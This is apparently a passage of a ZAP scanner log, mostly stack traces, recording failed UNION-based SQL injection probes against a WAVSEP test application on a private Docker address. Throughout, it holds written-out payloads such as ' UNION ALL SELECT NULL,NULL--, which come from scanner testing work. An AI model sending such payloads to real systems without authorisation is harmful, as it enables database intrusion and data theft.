org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679404 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679406 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679411 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679413 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679415 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679416 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679417 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679417 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679419 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679419 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679421 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679422 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679423 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error 